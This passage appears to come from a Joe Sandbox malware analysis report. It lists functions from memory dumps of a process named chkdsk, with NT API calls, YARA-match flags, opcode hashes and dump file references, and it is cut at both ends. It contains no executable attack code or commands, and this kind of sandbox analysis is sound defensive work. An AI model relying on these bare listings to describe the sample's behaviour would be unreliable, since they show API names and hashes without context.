                                                      • NtAllocateVirtualMemory.NTDLL(0076118B,?,?,00000000,00000004,00003000,?,?,?,?,?,?,0076118B,0076FF61,?,00000000), ref: 00777937
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_750000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateMemoryVirtual
                                                      • String ID:
                                                      • API String ID: 2167126740-0
                                                      • Opcode ID: f359f5d82faebaccd4494c43b8bee9817ba5ff76922e437d83e4df8c04e1250b
                                                      • Instruction ID: 10bf02b55e377593a9418066acb3517363c675ef5684ab390806b5cbbbce782d
                                                      • Opcode Fuzzy Hash: f359f5d82faebaccd4494c43b8bee9817ba5ff76922e437d83e4df8c04e1250b
                                                      • Instruction Fuzzy Hash: 8D2105B5A00648AFDB14EF98DC45FEFB7A9EF88711F008509FD18A7241D774A810CBA5
                                                      Function 00777690 Relevance: 1.6, APIs: 1, Instructions: 58filenativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_750000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DeleteFile
                                                      • String ID:
                                                      • API String ID: 4033686569-0
                                                      • Opcode ID: fef99ae8805eda17e1b638b3292ed56224c9cd73c8a113fc9df4491e960a74b9
                                                      • Instruction ID: 897b78d323b7b888df508797fc74299ecd12e1196b326a66297f4fb2863c6fb7
                                                      • Opcode Fuzzy Hash: fef99ae8805eda17e1b638b3292ed56224c9cd73c8a113fc9df4491e960a74b9
                                                      • Instruction Fuzzy Hash: DE01AD75640304BFE620EAA8DC4AFBB73ACDB85720F40850AFA19A7181DAB47910C7E1
                                                      Function 00777720 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00777754
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_750000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: ab3c5e634df23d89e276a079ed4ca5b525763aa1515c01312f02267f7250b466
                                                      • Instruction ID: 50ce587089b9a2bf3521d230a73601f529f3a5b1de3dc8a91f86b79a579d5543
                                                      • Opcode Fuzzy Hash: ab3c5e634df23d89e276a079ed4ca5b525763aa1515c01312f02267f7250b466
                                                      • Instruction Fuzzy Hash: 55E04F352002047BD610AA69CC05FD7776DDFC5761F408419FA0CA7142CA74791186F1
                                                      Function 054235C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: deb0809ab87f03c567e8c8646f669e595dcc91a5c7791f440178ee8d5b6ef63e
                                                      • Instruction ID: 205b6398176a73b6c2c92053193d4e1301f4a37ef621dae8332dbc244655d2a5
                                                      • Opcode Fuzzy Hash: deb0809ab87f03c567e8c8646f669e595dcc91a5c7791f440178ee8d5b6ef63e
                                                      • Instruction Fuzzy Hash: 8790023260650402D20071584555746502587E4201FA5C412B0428569D87958A5175A2
                                                      Function 05424650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: e1a8f12baa56a65ae2213b61c1e83e638e30755ef7211984f97022daad273754
                                                      • Instruction ID: 89386abb69801d322e94be1250117dd2cb954f719d254a4f29d4bc4f976bcff1
                                                      • Opcode Fuzzy Hash: e1a8f12baa56a65ae2213b61c1e83e638e30755ef7211984f97022daad273754
                                                      • Instruction Fuzzy Hash: D190026260250042424071584845446A02597F53013D5C116B0558561C87188955A269
                                                      Function 05424340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: b0fca23c7104fc5b5408622aef187beebaf883995ccba6999cde73ddbaa13cb7
                                                      • Instruction ID: 343fa918d00d3703298fdab9cee02707aa1b1dfa85f3c8563122f9ca99ea9805
                                                      • Opcode Fuzzy Hash: b0fca23c7104fc5b5408622aef187beebaf883995ccba6999cde73ddbaa13cb7
                                                      • Instruction Fuzzy Hash: F4900232606800129240715848C5586802597F4301B95C012F0428555C8B148A566361
                                                      Function 05422D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 76a5ec250fd734f4428451aca6e49bc6c280eb6213769198c78c1b0e08ad947c
                                                      • Instruction ID: 886d6a7dde529a674827a1064ca99f78017adf35fbe84220d0feefe063d64699
                                                      • Opcode Fuzzy Hash: 76a5ec250fd734f4428451aca6e49bc6c280eb6213769198c78c1b0e08ad947c
                                                      • Instruction Fuzzy Hash: EF90022A21340002D2807158544964A402587E5202FD5D416B0019559CCA1589696321
                                                      Function 05422D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 6398b09fd6f4b76af1618ca18c76f1bb5d6260d59fa064aff457490c5cf7d1a8
                                                      • Instruction ID: c26daef65ef7202c70d2dd39106220d188a8092b7fb6fd2ba869fcea6e0a0c38
                                                      • Opcode Fuzzy Hash: 6398b09fd6f4b76af1618ca18c76f1bb5d6260d59fa064aff457490c5cf7d1a8
                                                      • Instruction Fuzzy Hash: 2590022230240003D240715854596468025D7F5301F95D012F0418555CDA1589566222
                                                      Function 05422DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: e155c7778804f2b4e9513580b2a2d91be26c237d648509a0b0fe6de23f2585bc
                                                      • Instruction ID: 62196851dce44041657c8a5d1dc27e28c701f9636083bc8d8c969a94f228109b
                                                      • Opcode Fuzzy Hash: e155c7778804f2b4e9513580b2a2d91be26c237d648509a0b0fe6de23f2585bc
                                                      • Instruction Fuzzy Hash: F5900222243441525645B1584445547802697F42417D5C013B1418951C86269956E621
                                                      Function 05422DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 018f33c55993c6d26e6aa76dc0a234b5647db66dd5d150d7b827fd9c86ff393c
                                                      • Instruction ID: 91b22ae47935fae8e79834dde739c6665ccf749eada328e31d89f646aff30b67
                                                      • Opcode Fuzzy Hash: 018f33c55993c6d26e6aa76dc0a234b5647db66dd5d150d7b827fd9c86ff393c
                                                      • Instruction Fuzzy Hash: 2090023220240413D21171584545747402987E4241FD5C413B0428559D97568A52B121
                                                      Function 05422C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 6ffe450a0bae5eec38556eb913d813710daed5446f0bcf714e67030e8356d939
                                                      • Instruction ID: e997e2722ed140a6e971aaf330015b965d073684e9883dd1cde41032434a4d87
                                                      • Opcode Fuzzy Hash: 6ffe450a0bae5eec38556eb913d813710daed5446f0bcf714e67030e8356d939
                                                      • Instruction Fuzzy Hash: 0090023220240842D20071584445B86402587F4301F95C017B0128655D8715C9517521
                                                      Function 05422C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: e4dffc9c0cc94d5dfd84e9c060340b9e9c09c0ec7d8d80f87ccb3b4799ff1616
                                                      • Instruction ID: bb455d3a140c634dee6a8da8eba4b968e79ba3b07dd2e686f1a9bbe1635bfd26
                                                      • Opcode Fuzzy Hash: e4dffc9c0cc94d5dfd84e9c060340b9e9c09c0ec7d8d80f87ccb3b4799ff1616
                                                      • Instruction Fuzzy Hash: 0590023220248802D2107158844578A402587E4301F99C412B4428659D879589917121
                                                      Function 05422CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 5f8680f1db5820922915df0b12166482823cb59d23a99ac335ada5be9f3a397f
                                                      • Instruction ID: 65fe290c9714ceea0581e00a8352ebaa288bc04d6f31fbb4be9bdc00615f786a
                                                      • Opcode Fuzzy Hash: 5f8680f1db5820922915df0b12166482823cb59d23a99ac335ada5be9f3a397f
                                                      • Instruction Fuzzy Hash: 9490023220240402D20075985449686402587F4301F95D012B5028556EC76589917131
                                                      Function 05422F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: d928bd5557735ce32520765fd9fc3a67c23f5c384a24e62c27df39360cbd4bbc
                                                      • Instruction ID: 3c4928ac148a72b1e09b3b6f6f8dc860c8c1cd89e2f9671acb2304624f0ad30e
                                                      • Opcode Fuzzy Hash: d928bd5557735ce32520765fd9fc3a67c23f5c384a24e62c27df39360cbd4bbc
                                                      • Instruction Fuzzy Hash: EF90026234240442D20071584455B464025C7F5301F95C016F1068555D8719CD527126
                                                      Function 05422FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: f9ffe17a9bde6444c40819ea3cb2c7aed9a1ab5b8b9e3a6457eab6a17e5c3b3c
                                                      • Instruction ID: 1c8104035a4fa9fdafa0c0244577b4c0d38bf62960a62139a6f28cc20d0cb67f
                                                      • Opcode Fuzzy Hash: f9ffe17a9bde6444c40819ea3cb2c7aed9a1ab5b8b9e3a6457eab6a17e5c3b3c
                                                      • Instruction Fuzzy Hash: EB900222212C0042D30075684C55B47402587E4303F95C116B0158555CCA1589616521
                                                      Function 05422FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: a603763f77e295d8248d7e4937dabd3c2097cd23f0feb53b122802bb9c32145b
                                                      • Instruction ID: 60efeccbeb47f31c1248316ac48e2a0638c39ca18c590173646c7542ac7e0ac1
                                                      • Opcode Fuzzy Hash: a603763f77e295d8248d7e4937dabd3c2097cd23f0feb53b122802bb9c32145b
                                                      • Instruction Fuzzy Hash: 39900222602400424240716888859468025ABF5211795C122B099C551D865989656665
                                                      Function 05422EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 650be16d22c0eed2744a89f0a064f5a992afcdac5ba84ca252916684426f3a40
                                                      • Instruction ID: 45ee58cffcc39c14fa180a66efb6852863dc7b3c5c9bbc88423b1a24f834000b
                                                      • Opcode Fuzzy Hash: 650be16d22c0eed2744a89f0a064f5a992afcdac5ba84ca252916684426f3a40
                                                      • Instruction Fuzzy Hash: 9890026220280403D24075584845647402587E4302F95C012B2068556E8B298D517135
                                                      Function 05422E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 580bf2dfce1055e336f01d1b44cccca8ed19af51925309ab305200c513e5d658
                                                      • Instruction ID: 8ee3350b1cff8656d3e8ae3abb8a64d4a8ca89b133618fd76d63c390243efe55
                                                      • Opcode Fuzzy Hash: 580bf2dfce1055e336f01d1b44cccca8ed19af51925309ab305200c513e5d658
                                                      • Instruction Fuzzy Hash: A790022260240502D20171584445656402A87E4241FD5C023B1028556ECB258A92B131
                                                      Function 054239B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: e1a3c0cb237ffb40be644ad4926f11b316c04d4991e6cbf436bc6058067e446f
                                                      • Instruction ID: 06d7c3aceccd5a3c1ffc52d9ea29fa0855a2eadfd50e1440afec5d750a1875c0
                                                      • Opcode Fuzzy Hash: e1a3c0cb237ffb40be644ad4926f11b316c04d4991e6cbf436bc6058067e446f
                                                      • Instruction Fuzzy Hash: 8B90022224645102D250715C44456568025A7F4201F95C022B0818595D865589557221
                                                      Function 05422B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 40c79e7f882e0d49e04d3cec9f7c1ca01457bfbf78e0f113cdb27690fb02bf25
                                                      • Instruction ID: 0ca59c23edd0a95719af5cc64d86243f8b00d3ff38e62b1cab785328a4fc46e6
                                                      • Opcode Fuzzy Hash: 40c79e7f882e0d49e04d3cec9f7c1ca01457bfbf78e0f113cdb27690fb02bf25
                                                      • Instruction Fuzzy Hash: 2190026220340003420571584455656802A87F4201B95C022F1018591DC62589917125
                                                      Function 05422BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: b84cbbc4920691bc690f2ef6dd3e518ea87ec5dfdf60f07cb466cfe0770200c0
                                                      • Instruction ID: 128703e8626485077e4524eb85c04850179dc35594a98ec522afe2c49de0179b
                                                      • Opcode Fuzzy Hash: b84cbbc4920691bc690f2ef6dd3e518ea87ec5dfdf60f07cb466cfe0770200c0
                                                      • Instruction Fuzzy Hash: 4990023220644842D24071584445A86403587E4305F95C012B0068695D97258E55B661
                                                      Function 05422BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: eafd4d431a7cc3779f05b4130208107ed5c4da2f585d5e8801d520a425c90f89
                                                      • Instruction ID: a5b0ff7a7bbd9bf92611ce9ea2556ceffa65f2dd04dc5668ad0d342bb1aeaa3f
                                                      • Opcode Fuzzy Hash: eafd4d431a7cc3779f05b4130208107ed5c4da2f585d5e8801d520a425c90f89
                                                      • Instruction Fuzzy Hash: F990023220240802D2807158444568A402587E5301FD5C016B0029655DCB158B5977A1
                                                      Function 05422BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 59c4183841f85d508b609d851183ecdb625bddaa87786fbe6162df834dc159c0
                                                      • Instruction ID: 68e6f16fbe17adc9b0662cea3447ad919bc10f6b08a11e9b58abee9a0f789271
                                                      • Opcode Fuzzy Hash: 59c4183841f85d508b609d851183ecdb625bddaa87786fbe6162df834dc159c0
                                                      • Instruction Fuzzy Hash: 9390023260640802D25071584455786402587E4301F95C012B0028655D87558B5576A1
                                                      Function 05422AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmpDownload File
